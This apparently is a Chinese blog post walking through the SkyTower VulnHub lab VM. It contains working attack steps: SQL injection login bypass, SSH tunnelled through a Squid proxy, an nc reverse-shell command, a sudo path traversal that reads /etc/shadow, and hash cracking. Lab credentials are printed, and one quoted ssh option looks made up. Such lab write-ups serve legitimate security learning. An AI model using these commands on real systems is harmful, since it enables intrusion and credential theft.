{"id":192,"date":"2024-04-21T20:33:19","date_gmt":"2024-04-21T12:33:19","guid":{"rendered":"http:\/\/xiyu12.top\/?p=192"},"modified":"2024-04-21T20:33:19","modified_gmt":"2024-04-21T12:33:19","slug":"skytower","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=192","title":{"rendered":"skytower"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li><strong>Name<\/strong>: SkyTower: 1<\/li>\n\n\n\n<li><strong>Date release<\/strong>: 26 Jun 2014<\/li>\n\n\n\n<li><strong>Author<\/strong>:\u00a0<a href=\"https:\/\/www.vulnhub.com\/author\/telspace,90\/\">Telspace<\/a><\/li>\n\n\n\n<li><strong>Series<\/strong>:\u00a0<a href=\"https:\/\/www.vulnhub.com\/series\/skytower,47\/\">SkyTower<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sn 192.168.56.0\/24    \u83b7\u5f97\u76ee\u6807IP 192.168.56.101     <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sT &#8211;min-rate 10000 -p- 192.168.56.101<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;sudo] xiyu \u7684\u5bc6\u7801\uff1a\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-04-21 09:54 CST\nNmap scan report for 192.168.56.101\nHost is up (0.00067s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT     STATE    SERVICE\n22\/tcp   filtered ssh\n80\/tcp   open     http\n3128\/tcp open     squid-http\nMAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 4.56 seconds<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sC -sV -p 22,80,3128 192.168.56.101<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Starting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-04-21 20:29 CST\nNmap scan report for 192.168.56.101\nHost is up (0.00035s latency).\n\nPORT     STATE    SERVICE    VERSION\n22\/tcp   filtered ssh\n80\/tcp   open     http       Apache httpd 2.2.22 ((Debian))\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: Apache\/2.2.22 (Debian)\n3128\/tcp open     http-proxy Squid http proxy 3.1.20\n|_http-title: ERROR: The requested URL could not be retrieved\n|_http-server-header: squid\/3.1.20\nMAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 34.96 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">web\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u76ee\u5f55\u626b\u63cf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">gobuster dir -u http:\/\/192.168.56.101 &#8211;wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x .zip,.sql,.html,.rar,.txt,.php<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n&#91;+] Url:                     http:\/\/192.168.56.101\n&#91;+] Method:                  GET\n&#91;+] Threads:                 10\n&#91;+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n&#91;+] Negative Status codes:   404\n&#91;+] User Agent:              gobuster\/3.6\n&#91;+] Extensions:              html,rar,txt,php,zip,sql\n&#91;+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) &#91;Size: 286]\n\/.html                (Status: 403) &#91;Size: 287]\n\/index.html           (Status: 200) &#91;Size: 1136]\n\/index                (Status: 200) &#91;Size: 1136]\n\/login.php            (Status: 200) &#91;Size: 21]\n\/background           (Status: 200) &#91;Size: 2572609]\n\/.html                (Status: 403) &#91;Size: 287]\n\/.php                 (Status: 403) &#91;Size: 286]\n\/background2          (Status: 200) &#91;Size: 2831446]\n\/server-status        (Status: 403) &#91;Size: 295]<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e8c\u3001\u7acb\u8db3\u70b9<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee http:\/\/192.168.56.101  \u5176\u5b9e\u662f\u8bbf\u95ee  http:\/\/192.168.56.101\/index.html<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6709\u4e00\u4e2a\u767b\u9646\u6846  \u7acb\u5373\u60f3\u5230\u8981\u6d4b\u8bd5  SQL\u6ce8\u5165  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u4ea4\u4e00\u4e0b\u7528\u6237\u540d\u548c\u5bc6\u7801     \u53d1\u73b0\u4f1a\u63d0\u4ea4\u5230  login.php   <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6d4b\u8bd5 &#8216; &#8221;   \u53ef\u4ee5\u53d1\u73b0 \u662f\u786e\u5b9a\u6709sql\u6ce8\u5165\u70b9\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-15-1024x599.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"599\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-15-1024x599.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-195\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-21-205429-1024x100.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-21-205429-1024x100.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-196\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c1d\u8bd5\u4f7f\u7528 1 &#8216; or 1=1 #  \u7a81\u7834\u767b\u9646\u9a8c\u8bc1 \u8fdb\u5165\u540e\u53f0<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u53d1\u73b0  \u6709\u591a\u4e2a\u5b57\u7b26\u88ab \u8fc7\u6ee4  or    union   select <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-16-1024x394.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"394\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-16-1024x394.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-199\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">or  \u88ab\u8fc7\u6ee4\u4e86    \u4f7f\u7528  ||   &#8212;>   1\u2018 || 1=1   #   \u7ed5\u8fc7\u6210\u529f\u767b\u9646\u540e\u53f0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-21-210436-1024x739.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-21-210436-1024x739.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-200\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97\u4e00\u4e2a\u51ed\u8bc1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Username: john<br>Password: hereisjohn<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u662f \u53d1\u73b0 22\u7aef\u53e3  \u662f  filtered   ssh\u767b\u9646\u7528\u4e0d\u4e86  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u540c\u65f6  \u53d1\u73b0\u6709\u7aef\u53e3  3128  \u8fd0\u884c\u7740 squid-http \u670d\u52a1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Squid \u662f\u4e00\u4e2a\u6d41\u884c\u7684\u5f00\u6e90\u4ee3\u7406\u670d\u52a1\u5668\u8f6f\u4ef6\uff0c\u5e38\u7528\u4e8e\u7f13\u5b58\u548c\u8fc7\u6ee4 Web \u5185\u5bb9\uff0c\u4ee5\u53ca\u63d0\u4f9b\u5b89\u5168\u7684\u7f51\u7edc\u8bbf\u95ee\u3002\n1.\u4ee3\u7406\u670d\u52a1\u5668\uff1aSquid \u662f\u4e00\u4e2a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u53ef\u4ee5\u4f5c\u4e3a\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u5668\u4e4b\u95f4\u7684\u4e2d\u95f4\u4eba\uff0c\u4ee3\u7406\u5ba2\u6237\u7aef\u53d1\u9001\u7684\u8bf7\u6c42\u5e76\u8fd4\u56de\u670d\u52a1\u5668\u7684\u54cd\u5e94\u3002\n2.\u7f13\u5b58\u529f\u80fd\uff1aSquid \u53ef\u4ee5\u7f13\u5b58\u7ecf\u5e38\u8bbf\u95ee\u7684 Web \u5185\u5bb9\uff0c\u63d0\u9ad8\u8bbf\u95ee\u901f\u5ea6\u5e76\u51cf\u5c11\u5bf9\u6e90\u670d\u52a1\u5668\u7684\u8d1f\u8f7d\u3002\n\u8fc7\u6ee4\u529f\u80fd\uff1aSquid \u53ef\u4ee5\u6839\u636e\u914d\u7f6e\u89c4\u5219\u8fc7\u6ee4 Web \u5185\u5bb9\uff0c\u4f8b\u5982\u7981\u6b62\u8bbf\u95ee\u7279\u5b9a\u7f51\u7ad9\u3001\u963b\u6b62\u67d0\u4e9b\u6587\u4ef6\u7c7b\u578b\u7684\u4e0b\u8f7d\u7b49\u3002\n3.\u5b89\u5168\u6027\uff1aSquid \u53ef\u4ee5\u63d0\u4f9b\u5b89\u5168\u7684\u7f51\u7edc\u8bbf\u95ee\uff0c\u5305\u62ec SSL\/TLS \u52a0\u5bc6\u8fde\u63a5\u3001\u8bbf\u95ee\u63a7\u5236\u5217\u8868\u7b49\u529f\u80fd<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">squid  \u662f\u4e2a\u4ee3\u7406\u670d\u52a1\u5668\u8f6f\u4ef6  \u53ef\u4ee5\u5c06\u4e00\u4e2aIP\uff1a\u7aef\u53e3\u7684\u8f6c\u53d1\u5230\u53e6\u4e00\u4e2aIP\uff1a\u7aef\u53e3  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5df2\u77e5 80 \u53ef\u4ee5\u8bbf\u95ee 22 \u4e0d\u53ef\u4ee5\u8bbf\u95ee  \u6211\u4eec\u5047\u8bbe 3128 \u7aef\u53e3 \u5c06\u6d41\u91cf \u8f6c\u53d1\u523022 \u7aef\u53e3<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528 \u5de5\u5177  \u5c06\u8bbf\u95ee 22\u7aef\u53e3\u7684\u6d41\u91cf \u8f6c\u53d1\u52303128 \u7aef\u53e3<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">proxytunnel -a 6666 -p 192.168.56.101:3128 -d 192.168.56.101:22&amp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\nProxytunnel\uff1a\nproxytunnel \u662f\u7528\u4e8e\u5efa\u7acb TCP \u96a7\u9053\u7684\u5de5\u5177\uff0c\u4e3b\u8981\u7528\u4e8e\u901a\u8fc7\u4ee3\u7406\u670d\u52a1\u5668\u8fde\u63a5\u5230\u76ee\u6807\u670d\u52a1\uff0c\u4f8b\u5982\u901a\u8fc7 HTTP \u4ee3\u7406\u8fde\u63a5\u5230 SSH \u670d\u52a1\u3002\u901a\u8fc7\u4ee3\u7406\u670d\u52a1\u5668\u8fdb\u884c\u7f51\u7edc\u901a\u4fe1\uff0c\u901a\u5e38\u7528\u4e8e\u7ed5\u8fc7\u7f51\u7edc\u9632\u706b\u5899\u6216\u8005\u589e\u5f3a\u901a\u4fe1\u7684\u5b89\u5168\u6027\u3002\nproxytunnel \u4e3b\u8981\u7528\u4e8e\u5efa\u7acb\u5355\u4e2a TCP \u96a7\u9053\uff0c\u4e00\u6b21\u53ea\u80fd\u8fde\u63a5\u4e00\u4e2a\u76ee\u6807\u670d\u52a1\u3002\nproxytunnel -a local_port -p proxy_server:proxy_port -d destination_host:destination_port\n-a local_port\uff1a\u672c\u5730\u76d1\u542c\u7684\u7aef\u53e3\u53f7\uff0c\u4ee3\u7406\u670d\u52a1\u5668\u4f1a\u5c06\u6d41\u91cf\u8f6c\u53d1\u5230\u8be5\u7aef\u53e3\u3002\n-p proxy_server:proxy_port\uff1a\u4ee3\u7406\u670d\u52a1\u5668\u7684\u5730\u5740\u548c\u7aef\u53e3\u53f7\u3002\n-d destination_host:destination_port\uff1a\u76ee\u6807\u4e3b\u673a\u7684\u5730\u5740\u548c\u7aef\u53e3\u53f7\u3002<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains ssh john@192.168.56.101<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u914d\u7f6e proxychains \u7684\u914d\u7f6e\u6587\u4ef6\/etc\/proxychains.conf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo vim \/etc\/proxychains.conf   \u6dfb\u52a0\u4e00\u6761\u8bb0\u5f55<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http  192.168.56.101 3128<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1.proxychains \u662f\u4e00\u4e2a\u53ef\u4ee5\u8ba9\u4efb\u4f55\u7a0b\u5e8f\u901a\u8fc7 SOCKS4\u3001SOCKS5 \u6216 HTTP \u4ee3\u7406\u8fdb\u884c\u7f51\u7edc\u8fde\u63a5\u7684\u5de5\u5177\u3002\u5b83\u53ef\u4ee5\u5bf9\u6574\u4e2a\u7cfb\u7edf\u6216\u8005\u7279\u5b9a\u7a0b\u5e8f\u8fdb\u884c\u4ee3\u7406\u8bbe\u7f6e\uff0c\u4f7f\u5f97\u6240\u6709\u7f51\u7edc\u6d41\u91cf\u90fd\u7ecf\u8fc7\u4ee3\u7406\u670d\u52a1\u5668\u3002\n2.proxychains \u4e0d\u4ec5\u53ef\u4ee5\u7528\u4e8e\u5efa\u7acb TCP \u96a7\u9053\uff0c\u8fd8\u53ef\u4ee5\u7528\u4e8e\u4ee3\u7406 UDP \u6570\u636e\u5305\uff0c\u540c\u65f6\u4e5f\u652f\u6301 DNS \u8bf7\u6c42\u7684\u4ee3\u7406\u3002\n3.proxychains \u7684\u4f7f\u7528\u66f4\u52a0\u7075\u6d3b\uff0c\u53ef\u4ee5\u5bf9\u591a\u4e2a\u7a0b\u5e8f\u6216\u8005\u7cfb\u7edf\u7ea7\u522b\u7684\u7f51\u7edc\u6d41\u91cf\u8fdb\u884c\u4ee3\u7406\u8bbe\u7f6e\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c1d\u8bd5\u4f7f\u7528 \u51ed\u8bc1\u767b\u9646  <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-21-213135-1024x447.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-21-213135-1024x447.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-204\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u9646\u6210\u529f\u4e86  \u4f46\u662f\u7acb\u523b\u88ab\u65ad\u5f00 <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ecf\u8fc7\u641c\u7d22\u4e4b\u540e\u53d1\u73b0<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u5728 \/etc\/profile \u6216\u7528\u6237\u7684 .bashrc \u6587\u4ef6\u4e2d\u8bbe\u7f6e TMOUT \u53d8\u91cf\u6765\u5b9a\u4e49\u4f1a\u8bdd\u8d85\u65f6\u65f6\u95f4\nTMOUT=0   # \u7acb\u5373\u9000\u51fa\u4f1a\u8bdd\nexport TMOUT\n\u4e00\u65e6\u7528\u6237\u5728 Shell \u4e2d\u6ca1\u6709\u6d3b\u52a8\uff08\u5373\u6ca1\u6709\u952e\u76d8\u8f93\u5165\uff09\u7acb\u5373\u4f1a\u8bdd\u4f1a\u88ab\u5f3a\u5236\u9000\u51fa\uff0c\u65e0\u9700\u7b49\u5f85\u8d85\u65f6\u65f6\u95f4\u7ed3\u675f\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u65e2\u7136\u767b\u9646\u4e4b\u540e\u9a6c\u4e0a\u4f1a\u88ab\u9000\u51fa  \u5c31\u4f7f\u7528  ssh \u7684\u547d\u4ee4\u6267\u884c  \u67e5\u770b\u4e00\u4e0b\u60c5\u51b5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains ssh john@192.168.56.101 -t  \u201cls -al\u201d<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"> <code>-t<\/code> \u53c2\u6570\u7528\u4e8e\u5f3a\u5236\u5206\u914d\u4e00\u4e2aTTY\u3002\u5f53\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u65f6\uff0cssh\u4f1a\u542f\u52a8\u4e00\u4e2a\u8fdc\u7a0bshell\u5e76\u63d0\u4f9b\u4e0e\u672c\u5730shell\u76f8\u4f3c\u7684\u4ea4\u4e92\u5f0f\u7ec8\u7aef\u3002  \u611f\u89c9\u4e0d\u52a0\u4e5f\u6ca1\u5173\u7cfb  \u6ca1\u4ec0\u4e48\u672c\u8d28\u7684\u5dee\u522b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains ssh john@192.168.56.101 -t \"nc -e \/bin\/bash 192.168.56.101 1234\"\nnc -lvp  1234 \n\u53ef\u4ee5\u53d1\u73b0 \u83b7\u5f97\u4e86\u4e00\u4e2a\u6700\u521d\u59cb\u7684\u53cd\u5f39shell\uff0c\u53ef\u4ee5\u6267\u884c\u547d\u4ee4 \n\u4f46\u662f\u60f3\u8981 \u83b7\u53d6\u4e00\u4e2a\u4ea4\u4e92shell \u65f6\u53d1\u73b0\u548c ssh\u767b\u9646\u65f6\u4e00\u6837 \u81ea\u52a8\u9000\u51fa\u4e86 \u4ea4\u4e92\u7684shell<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-21-223110.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-21-223110.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-211\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u67e5\u770b .bahsrc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>if ! shopt -oq posix; then\n  if &#91; -f \/usr\/share\/bash-completion\/bash_completion ]; then\n    . \/usr\/share\/bash-completion\/bash_completion\n  elif &#91; -f \/etc\/bash_completion ]; then\n    . \/etc\/bash_completion\n  fi\nfi\n\necho\necho  \"Funds have been withdrawn\"\nexit\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06.bashrc \u5220\u9664\u53ef\u4ee5\u767b\u9646  cp .bashrc bashrc   rm .bashrc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d2\u64ad\u4e24\u4e2a\u6ca1\u6709\u9a8c\u8bc1\u7684\u65b9\u6cd5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u4e34\u65f6\u7981\u7528.bashrc\uff1a\n\u5982\u679c\u53d1\u73b0exit\u547d\u4ee4\u662f\u5bfc\u81f4\u95ee\u9898\u7684\u539f\u56e0\uff0c\u4f60\u53ef\u4ee5\u901a\u8fc7\u5728SSH\u547d\u4ee4\u4e2d\u4f7f\u7528-o\uff08\u6216--option\uff09\u9009\u9879\u6765\u7981\u7528.bashrc\u7684\u52a0\u8f7d\uff1a\n\nssh -o \"no_dotbashrc\" username@hostname\n\u6216\u8005\uff0c\u4f60\u53ef\u4ee5\u5728\u767b\u5f55\u540e\u7acb\u5373\u8fd0\u884c\u4ee5\u4e0b\u547d\u4ee4\u6765\u7981\u7528.bashrc\uff1a\n\nsource &lt;(echo \"exit\")<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains ssh john@192.168.56.101  \u767b\u9646\u6210\u529f<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"> \u67e5\u770b   \/var\/www\/login.php       \u5176\u4e2d\u6709\u767b\u9646\u7684\u903b\u8f91  \u5305\u542b\u4e86\u6570\u636e\u5e93\u8fde\u63a5\u7684\u8bed\u53e5 \u83b7\u5f97mysql \u7684\u7528\u6237\u548c\u5bc6\u7801<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">mysql -u root -p root<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u9646mysql  \u53d1\u73b0\u4e00\u4e2a\u7528\u6237\u8868 <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97\u7528\u6237\u51ed\u8bc1\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sara ihatethisjob<br>william senseable<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">su sara  \u8f93\u5165\u5bc6\u7801 \u7528\u6237\u63d0\u6743\u6210\u529f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo -l<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Matching Defaults entries for sara on this host:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sara may run the following commands on this host:\n    (root) NOPASSWD: \/bin\/cat \/accounts\/*, (root) \/bin\/ls \/accounts\/*<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u77e5\u8bc6\u70b9 \uff1a ..\/\u7ed5\u8fc7\u547d\u4ee4\u5bf9\u8def\u5f84\u7684\u9650\u5236  2.\u5728\u5bb6\u76ee\u5f55 \u53ef\u4ee5\u4f7f\u7528  ln -sv \/etc\/shadow shadow    \u521b\u5efashadow \u6307\u5411\/etc\/shadow    \u6ce8\u610f\uff1a\u5728\u5bb6\u76ee\u5f55\u7528\u6237\u53ef\u4ee5\u505a\u5f88\u591a\u4e8b\u60c5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo \/bin\/cat \/accounts\/..\/home\/sara\/shadow<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5176\u5b9e\u76f4\u63a5\u6784\u9020 \u6210  sudo \/bin\/cat \/accounts\/..\/etc\/shadow  \u5c31\u53ef\u4ee5\uff08\u54c8\u54c8\uff09<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97root \u7684\u51ed\u8bc1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u5efa\u4e00\u4e2a\u5b57\u5178\u6765\u7206\u7834root\u51ed\u8bc1\nvim pass \nskytower\nhashcat --stdout pass -r \/home\/xiyu\/OneRuleToRuleThemStill-main\/OneRuleToRuleThemStill.rule  >passlist.txt\njohn --format=sha512crypt --wordlist=.\/pass hash  <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97root\u7684\u5bc6\u7801  <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">su root<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u6743\u6210\u529f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u4fe1\u606f\u6536\u96c6 sudo nmap -sn 192.168.56.0\/24 \u83b7\u5f97\u76ee\u6807IP 192.168.56. 